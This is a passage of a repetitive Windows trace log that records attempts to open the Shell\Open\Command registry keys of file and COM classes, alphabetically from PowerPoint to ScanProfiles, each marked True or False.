Open Key HKEY_LOCAL_MACHINE\Software\Classes\PowerPoint.SlideShowMacroEnabled.12\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PowerPoint.Template\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PowerPoint.Template.12\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PowerPoint.Template.8\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PowerPoint.TemplateMacroEnabled\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PowerPoint.TemplateMacroEnabled.12\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PowerPoint.UriLink.16\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PowerPoint.Wizard.8\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\powerpointhtmlfile\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\powerpointhtmltemplate\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\powerpointmhtmlfile\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\powerpointxmlfile\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PPSLAX.SlideLibrary\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Presenter.MCVideoPresenter\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Presenter.MCVideoPresenter.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Previous.Versions\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\prffile\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Printers\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PrintSys.CoFilterPipeline\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PrintSys.CoFilterPipeline.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PrintSys.CoPrintIsolationHost\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PrintSys.CoPrintIsolationHost.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Project\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ProjectHeader.ProjectHeader\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ProjectModel.Link\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ProjectModel.PMDocument\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ProjectModel.PMEvents\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ProjectModel.PMObject\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ProjectModel.Project\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ProjectModel.RelEnum\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ProjectModel.Task\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PropertyEntry\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PropertyKeyCollection.PropertyKeyCollection\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PropertyKeyCollection.PropertyKeyCollection.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PropertyValue\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PropRpt.VisExcelRptDriver\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PropRpt.VisListRptDriver\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PropRpt.VisReportDef\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PropRpt.VisReportManager\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PropRpt.VisVisioRptDriver\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PropVariantCollection.PropVariantCollection\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PropVariantCollection.PropVariantCollection.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PROTOCOLS\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Psisdecd.AnalogCable\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Psisdecd.AnalogCable.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Psisdecd.AtscPsipParser\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Psisdecd.AtscPsipParser.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Psisdecd.ATSCTerrestrial\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Psisdecd.ATSCTerrestrial.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Psisdecd.CDvb\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Psisdecd.CDvb.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Psisdecd.CIsdb\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Psisdecd.CIsdb.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Psisdecd.DigitalCable\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Psisdecd.DigitalCable.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Psisdecd.DvbSiParser\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Psisdecd.DvbSiParser.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Psisdecd.PBDA\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Psisdecd.PBDA.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PTRegTerminal.Class\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PTRegTerminalClass.Class\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PublishedApp\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Publisher.Application\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Publisher.Application.16\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Publisher.Document\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Publisher.Document.16\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Publisher.UriLink.16\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\publisherhtmlfile\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\publishermhtmlfile\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\QC.DLQListener\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\QC.ListenerHelper\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\QC.MessageMover\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\QC.MessageMover.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\QC.Recorder\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\qedit.DxtAlphaSetter\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\qedit.DxtAlphaSetter.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\qedit.DxtCompositor\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\qedit.DxtCompositor.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\qedit.DxtJpeg\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\qedit.DxtJpeg.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\qedit.DxtJpegPP\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\qedit.DxtJpegPP.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\qedit.DxtKey\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\qedit.DxtKey.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\qedit.GrfCache\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\qedit.GrfCache.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\qedit.MediaLocator\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\qedit.MediaLocator.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\qedit.RenderEngine\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\qedit.RenderEngine.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\qedit.SmartRenderEngine\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\qedit.SmartRenderEngine.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\qedit.Xml2Dex\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\qedit.Xml2Dex.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\QueryAllWinSAT\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\QueryWinSAT\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\queue\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RACplDlg.RARegSetting\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RACplDlg.RARegSetting.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RACplDlg.RASettingProperty\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RACplDlg.RASettingProperty.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RAServer.RASMapi\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RAServer.RASMapi.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RAServer.RASrv\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RAServer.RASrv.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RAServer.RemoteAssistance\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RAServer.RemoteAssistance.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ratfile\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RCM.ConnectionManager\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RCM.ConnectionManager.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RDB.AutoPlayHandler\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RDBFileProperties.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RDP.File\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Rdpcomapi.RDPSession\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Rdpcomapi.RDPSession.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RdpCoreKMTS.WTSProtocolManager\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RdpCoreKMTS.WTSProtocolManager.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Rdpvcomapi.RDPViewer\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Rdpvcomapi.RDPViewer.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RDS.DataControl\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RDS.DataControl.6.0\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RDS.DataSpace\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RDS.DataSpace.6.0\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RDSServer.DataFactory\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RDSServer.DataFactory.6.0\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RECIP.RecipCtl.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Record\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\regedit\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\regfile\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RegisterControl.Register\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RegisterControl.Register.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RemoteAssistance.1\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RemoteHelper.RemoteHelper\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ReplicateCatalog.ReplicateCatalog\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ReplicateCatalog.ReplicateCatalog.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RequestMakeCall.RequestMakeCall\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RequestMakeCall.RequestMakeCall.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ResourceAssignment.ResourceAssignment\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ResourceInt.ResourceInt\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ResourceManager.ResourceManager\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Results\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\rlefile\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\rlogin\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RowPosition.RowPosition\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RowPosition.RowPosition.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RowsetHelper\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\rqyfile\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\rtffile\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpAudioFormat\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpAudioFormat.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpCompressedLexicon\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpCompressedLexicon.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpCustomStream\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpCustomStream.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpDataKey\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpDataKey.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpFileStream\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpFileStream.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpGramCompBackEnd\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpGramCompBackEnd.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpGrammarCompiler\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpGrammarCompiler.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpInProcRecoContext\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpInProcRecoContext.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpInprocRecognizer\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpInprocRecognizer.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpITNProcessor\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpITNProcessor.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpLexicon\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpLexicon.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpMemoryStream\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpMemoryStream.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpMMAudioEnum\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpMMAudioEnum.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpMMAudioIn\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpMMAudioIn.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpMMAudioOut\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpMMAudioOut.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SPNotify\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SPNotify.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpNotifyTranslator\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpNotifyTranslator.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpNullPhoneConverter\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpNullPhoneConverter.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpObjectToken\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpObjectToken.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpObjectTokenCategory\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpObjectTokenCategory.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpObjectTokenEnum\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpObjectTokenEnum.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpPhoneConverter\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpPhoneConverter.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpPhrase\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpPhrase.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpPhraseBuilder\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpPhraseBuilder.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpPhraseInfoBuilder\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpPhraseInfoBuilder.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpResourceManager\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpResourceManager.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpSharedRecoContext\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpSharedRecoContext.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpSharedRecognizer\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpSharedRecognizer.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpShortcut\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpShortcut.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpStream\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpStream.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpStreamFormatConverter\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpStreamFormatConverter.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpTextSelectionInformation\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpTextSelectionInformation.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpUncompressedLexicon\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpUncompressedLexicon.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpVoice\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpVoice.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpWaveFormatEx\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpWaveFormatEx.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPIEngine.TTSEngine\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPIEngine.TTSEngine.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SaveAsWeb.VisioSolutionDocumentMap\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SaveAsWeb.VisioSolutionDocumentMap.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SaveAsWeb.VisSaveAsWeb\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SaveAsWeb.VisSaveAsWeb.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SaveAsWeb.VisWebDispProxy\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SaveAsWeb.VisWebDispProxy.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SaveAsWeb.VisWebPageSettings\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SaveAsWeb.VisWebPageSettings.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SaveAsWebHF.SVGDispObj\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SaveAsWebRaster.GIFDispObj\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SaveAsWebRaster.JPGDispObj\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SaveAsWebRaster.PNGDispObj\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SaveAsWebVML.VMLDispObj\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SaveAsWebXAML.XAMLDispObj\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SavedDsQuery\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SBEServer.AudioCD\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SBEServer.AudioCD.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SBEServer.BurnDevice\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SBEServer.BurnDevice.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SBEServer.DataBurner\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SBEServer.DataBurner.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SBEServer.DiscBurner\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SBEServer.DiscBurner.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SBEServer.SBEDeviceManager\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SBEServer.SBEDeviceManager.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SBEServer.VideoAudioBurner\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SBEServer.VideoAudioBurner.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ScanProfiles.ScanProfileMgr\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ScanProfiles.ScanProfileMgr.1\Shell\Open\Command - False 1
